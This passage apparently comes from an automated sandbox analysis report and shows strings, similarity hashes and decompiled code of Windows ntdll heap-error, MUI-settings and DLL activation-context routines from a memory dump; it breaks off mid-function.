*** An Access Violation occurred in %ws:%s, xrefs: 018CB48F
write to, xrefs: 018CB4A6
The resource is owned shared by %d threads, xrefs: 018CB37E
This failed because of error %Ix., xrefs: 018CB446
an invalid address, %p, xrefs: 018CB4CF
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 018CB323
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 018CB2DC
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 018CB305
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 018CB3D6
a NULL pointer, xrefs: 018CB4E0
*** Inpage error in %ws:%s, xrefs: 018CB418
<unknown>, xrefs: 018CB27E, 018CB2D1, 018CB350, 018CB399, 018CB417, 018CB48E
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 018CB39B
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 018CB484
The critical section is owned by thread %p., xrefs: 018CB3B9
read from, xrefs: 018CB4AD, 018CB4B2
Go determine why that thread has not released the critical section., xrefs: 018CB3C5
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 018CB476
*** Resource timeout (%p) in %ws:%s, xrefs: 018CB352
The instruction at %p tried to %s , xrefs: 018CB4B6
The resource is owned exclusively by thread %p, xrefs: 018CB374
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 018CB47D
*** A stack buffer overrun occurred in %ws:%s, xrefs: 018CB2F3
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 018CB38F
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 018CB53F
*** enter .exr %p for the exception record, xrefs: 018CB4F1

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 8971fa1651047f57e9281d55e03552ce34d6e173537b5083b7c675e466f32efa
Instruction ID: 5722515401c4fa31142532e03edfd2f542b01840b89680501edc78def155ddd2
Opcode Fuzzy Hash: 8971fa1651047f57e9281d55e03552ce34d6e173537b5083b7c675e466f32efa
Instruction Fuzzy Hash: 14811531A00614FFEB226A9A8CC6D7F7F66AF56B95F40404CF504EB252E275CB81C672

Uniqueness

Uniqueness Score: -1.00%

Function 018D1C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E018D1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x17f48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0181B150();
				} else {
					E0181B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x190589c);
				E0181B150("Heap error detected at %p (heap handle %p)\n",  *0x19058a0);
				_t27 =  *0x1905898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M018D1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0181B150();
				} else {
					E0181B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0181B150("Error code: %d - %s\n",  *0x1905898);
				_t113 =  *0x19058a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0181B150();
					} else {
						E0181B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0181B150("Parameter1: %p\n",  *0x19058a4);
				}
				_t115 =  *0x19058a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0181B150();
					} else {
						E0181B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0181B150("Parameter2: %p\n",  *0x19058a8);
				}
				_t117 =  *0x19058ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0181B150();
					} else {
						E0181B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0181B150("Parameter3: %p\n",  *0x19058ac);
				}
				_t119 =  *0x19058b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0181B150();
					} else {
						E0181B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x19058b4);
					E0181B150("Last known valid blocks: before - %p, after - %p\n",  *0x19058b0);
				} else {
					_t120 =  *0x19058b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0181B150();
				} else {
					E0181B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0181B150("Stack trace available at %p\n", 0x19058c0);
			}

0x018d1c10
0x018d1c16
0x018d1c1e
0x018d1c3d
0x018d1c3e
0x018d1c20
0x018d1c35
0x018d1c3a
0x018d1c44
0x018d1c55
0x018d1c5a
0x018d1c65
0x018d1c67
0x00000000
0x018d1c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x018d1c67
0x018d1cdc
0x018d1ce5
0x018d1d04
0x018d1d05
0x018d1ce7
0x018d1cfc
0x018d1d01
0x018d1d0b
0x018d1d17
0x018d1d1f
0x018d1d25
0x018d1d30
0x018d1d4f
0x018d1d50
0x018d1d32
0x018d1d47
0x018d1d4c
0x018d1d61
0x018d1d67
0x018d1d68
0x018d1d6e
0x018d1d79
0x018d1d98
0x018d1d99
0x018d1d7b
0x018d1d90
0x018d1d95
0x018d1daa
0x018d1db0
0x018d1db1
0x018d1db7
0x018d1dc2
0x018d1de1
0x018d1de2
0x018d1dc4
0x018d1dd9
0x018d1dde
0x018d1df3
0x018d1df9
0x018d1dfa
0x018d1e00
0x018d1e0a
0x018d1e13
0x018d1e32
0x018d1e33
0x018d1e15
0x018d1e2a
0x018d1e2f
0x018d1e39
0x018d1e4a
0x018d1e02
0x018d1e02
0x018d1e08
0x00000000
0x00000000
0x018d1e08
0x018d1e5b
0x018d1e7a
0x018d1e7b
0x018d1e5d
0x018d1e72
0x018d1e77
0x018d1e95

Strings

Stack trace available at %p, xrefs: 018D1E86
heap_failure_unknown, xrefs: 018D1C75
Last known valid blocks: before - %p, after - %p, xrefs: 018D1E45
HEAP[%wZ]: , xrefs: 018D1C30, 018D1CF7, 018D1D42, 018D1D8B, 018D1DD4, 018D1E25, 018D1E6D
heap_failure_lfh_bitmap_mismatch, xrefs: 018D1CD7
Parameter2: %p, xrefs: 018D1DA5
heap_failure_freelists_corruption, xrefs: 018D1CC9
heap_failure_buffer_overrun, xrefs: 018D1C98
heap_failure_multiple_entries_corruption, xrefs: 018D1C8A
heap_failure_invalid_argument, xrefs: 018D1CAD
heap_failure_usage_after_free, xrefs: 018D1CBB
heap_failure_block_not_busy, xrefs: 018D1CA6
heap_failure_generic, xrefs: 018D1C7C
Heap error detected at %p (heap handle %p), xrefs: 018D1C50
heap_failure_cross_heap_operation, xrefs: 018D1CC2
Parameter3: %p, xrefs: 018D1DEE
heap_failure_internal, xrefs: 018D1C6E
heap_failure_buffer_underrun, xrefs: 018D1C9F
heap_failure_entry_corruption, xrefs: 018D1C83
HEAP: , xrefs: 018D1C16, 018D1C3D, 018D1D04, 018D1D4F, 018D1D98, 018D1DE1, 018D1E32, 018D1E7A
Error code: %d - %s, xrefs: 018D1D12
heap_failure_virtual_block_corruption, xrefs: 018D1C91
heap_failure_invalid_allocation_type, xrefs: 018D1CB4
heap_failure_listentry_corruption, xrefs: 018D1CD0
Parameter1: %p, xrefs: 018D1D5C

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: c5b6397add157d649750ab4adfc1fbecf43530da18070fda462537fbf6ab7a92
Instruction ID: d797ee06a25135e93985c064c27524ff6523277fe8aff790817cb1397f5b126a
Opcode Fuzzy Hash: c5b6397add157d649750ab4adfc1fbecf43530da18070fda462537fbf6ab7a92
Instruction Fuzzy Hash: AB61B933515649DFE662AB49E88DD2673B4EF05B2070A447EF90ADB345D6349B40CF0B

Uniqueness

Uniqueness Score: -1.00%

Function 01823D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E01823D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01821B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L018377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01821B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L018377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01821B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01821B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01821B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L018377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L018377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01834620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0185F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01861370(_t276, 0x17f4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0185BB40(0,  &_v68, _t170);
									if(L018243C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L018377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L018377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0185BB40(_t257,  &_v68, _t243);
								if(L018243C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01861370(_t278, 0x17f4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01834620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0185F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01861370(_v16, 0x17f4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0185BB40(_t262,  &_v68, _t244);
								if(L018243C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01861370(_t282, 0x17f4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0185BB40(_t262,  &_v68, _t201);
							if(L018243C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L018377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L018377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01834620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0185F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01861370(_t280, 0x17f4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0185BB40(_t267,  &_v68, _t245);
							if(L018243C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01861370(_t284, 0x17f4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0185BB40(_t267,  &_v68, _t224);
						if(L018243C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L018377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L018377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x01823d3c
0x01823d42
0x01823d44
0x01823d46
0x01823d49
0x01823d4c
0x01823d4f
0x01823d52
0x01823d55
0x01823d58
0x01823d5b
0x01823d5f
0x01823d61
0x01823d66
0x01878213
0x01878218
0x01824085
0x01824088
0x0182408e
0x01824094
0x0182409a
0x018240a0
0x018240a6
0x018240a9
0x018240af
0x018240b6
0x018240bd
0x018240bd
0x01823d83
0x0187821f
0x01878229
0x01878238
0x01878238
0x0187823d
0x0187823d
0x01823da0
0x01823daf
0x01823db5
0x01823dba
0x01823dba
0x01823dd4
0x01823e94
0x01823eab
0x01823f6d
0x01823f84
0x0182406b
0x0182406b
0x0182406e
0x0182406e
0x01824070
0x01824074
0x01878351
0x01878351
0x0182407a
0x0182407f
0x0187835d
0x01878370
0x01878377
0x01878379
0x0187837c
0x0187837c
0x0187835d
0x00000000
0x0182407f
0x01823f8a
0x01823f8d
0x01823f90
0x01823f95
0x0187830d
0x0187830f
0x01823f9b
0x01823fac
0x01823fae
0x01823fb1
0x01823fb1
0x01823fb6
0x01878317
0x0187831a
0x00000000
0x01823fbc
0x01823fc1
0x01823fc9
0x01823fd7
0x01823fda
0x01823fdd
0x01824021
0x01824021
0x01824029
0x01824030
0x01824044
0x01824046
0x01824046
0x01824044
0x01824049
0x01878327
0x01878334
0x01878339
0x0187833c
0x0182404f
0x0182404f
0x0182404f
0x01824051
0x01824056
0x01824063
0x01824063
0x01824068
0x00000000
0x01824068
0x01823fdf
0x01823fe2
0x01823fe4
0x01823fe7
0x01823fef
0x01824003
0x01824005
0x01824005
0x0182400c
0x01824013
0x01824016
0x01824017
0x0182401b
0x0182401e
0x00000000
0x0182401e
0x01823fb6
0x01823eb1
0x01823eb4
0x01823eb7
0x01823ebc
0x018782a9
0x018782ab
0x01823ec2
0x01823ed3
0x01823ed5
0x01823ed8
0x01823ed8
0x01823edd
0x018782b3
0x018782b6
0x00000000
0x01823ee3
0x01823ee8
0x01823eed
0x01823ef0
0x01823ef3
0x01823f02
0x01823f05
0x01823f08
0x018782c0
0x018782c3
0x018782c5
0x018782c8
0x018782d0
0x018782e4
0x018782e6
0x018782e6
0x018782ed
0x018782f4
0x018782f7
0x018782f8
0x018782fc
0x018782ff
0x018782ff
0x01823f0e
0x01823f11
0x01823f16
0x01823f1d
0x01823f31
0x01878307
0x01878307
0x01823f31
0x01823f39
0x01823f48
0x01823f4d
0x01823f50
0x01823f50
0x01823f53
0x01823f58
0x01823f65
0x01823f65
0x01823f6a
0x00000000
0x01823f6a
0x01823edd
0x01823dda
0x01823ddd
0x01823de0
0x01823de5
0x01878245
0x01823deb
0x01823df7
0x01823dfc
0x01823dfe
0x01823e01
0x01823e01
0x01823e06
0x0187824d
0x0187824f
0x01878254
0x00000000
0x01823e0c
0x01823e11
0x01823e16
0x01823e19
0x01823e29
0x01823e2c
0x01823e2f
0x0187825c
0x0187825f
0x01878261
0x01878264
0x0187826c
0x01878280
0x01878282
0x01878282
0x01878289
0x01878290
0x01878293
0x01878294
0x01878298
0x0187829b
0x0187829b
0x01823e35
0x01823e38
0x01823e3d
0x01823e44
0x01823e58
0x018782a3
0x018782a3
0x01823e58
0x01823e60
0x01823e6f
0x01823e74
0x01823e77
0x01823e77
0x01823e7a
0x01823e7f
0x01823e8c
0x01823e8c
0x01823e91
0x00000000
0x01823e91

Strings

Kernel-MUI-Number-Allowed, xrefs: 01823D8C
Kernel-MUI-Language-Allowed, xrefs: 01823DC0
Kernel-MUI-Language-Disallowed, xrefs: 01823E97
WindowsExcludedProcs, xrefs: 01823D6F
Kernel-MUI-Language-SKU, xrefs: 01823F70

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: f94ee62960b968286cfa3cbf04acac1940b1e8cfc4790bbe3de580cd75b08c73
Instruction ID: 123a5a3c0d8be311d612a3302d858b8c0e6437e9c7c368ae064af865e508598a
Opcode Fuzzy Hash: f94ee62960b968286cfa3cbf04acac1940b1e8cfc4790bbe3de580cd75b08c73
Instruction Fuzzy Hash: 4AF13C72D10629EBCB12DF98C984AEEBBB9FF58750F15006AE905E7211D7349F41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01848E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01848E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x190d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1908464; // 0x74b10110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1905780 & 0x00000003) != 0) {
							E01895510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1905780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0185B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1907984; // 0x1282b78
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1908464; // 0x74b10110
					 *0x190b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01849B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1905780 & 0x00000005) != 0) {
						_push(_t49);
						E01895510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x01848e0f
0x01848e16
0x01848e19
0x01848e1b
0x01848e21
0x01848e7f
0x01848e85
0x01889354
0x0188936c
0x01889371
0x0188937b
0x01889381
0x01889381
0x0188937b
0x01848e9d
0x01848e9d
0x01848e29
0x01848e2c
0x01848e38
0x01848e3e
0x01848e43
0x01848eb5
0x01848eb9
0x018892aa
0x018892af
0x018892e8
0x018892e8
0x018892af
0x01848eb9
0x01848e45
0x01848e53
0x01848e5b
0x01848e5f
0x01848e78
0x01848e78
0x01848e7d
0x01848ec3
0x01848ecd
0x01848ed2
0x01848ed2
0x01848ec5
0x01848ec5
0x00000000
0x01848e7d
0x01848e67
0x01848ea4
0x0188931a
0x00000000
0x00000000
0x01889320
0x01848ea4
0x01848e70
0x01889325
0x01889340
0x01889345
0x01889345
0x01848e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0188932A
minkernel\ntdll\ldrsnap.c, xrefs: 0188933B, 01889367
Querying the active activation context failed with status 0x%08lx, xrefs: 01889357
LdrpFindDllActivationContext, xrefs: 01889331, 0188935D

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: de75e6f0689f903b1f34e7d0ef1d6cab99baa0db0182a3ed48369b7e303c7dbf
Instruction ID: ce4a68d121c42e63b00e3a042842d8ee0f5a6f9a4d9085778ee42ae7ac69d081
Opcode Fuzzy Hash: de75e6f0689f903b1f34e7d0ef1d6cab99baa0db0182a3ed48369b7e303c7dbf
Instruction Fuzzy Hash: 14412C72E4031D9FEB37AADC884CA36B7A5AB42758F06416DEA04D7151EF706F808381

Uniqueness

Uniqueness Score: -1.00%

Function 01828794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E01828794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
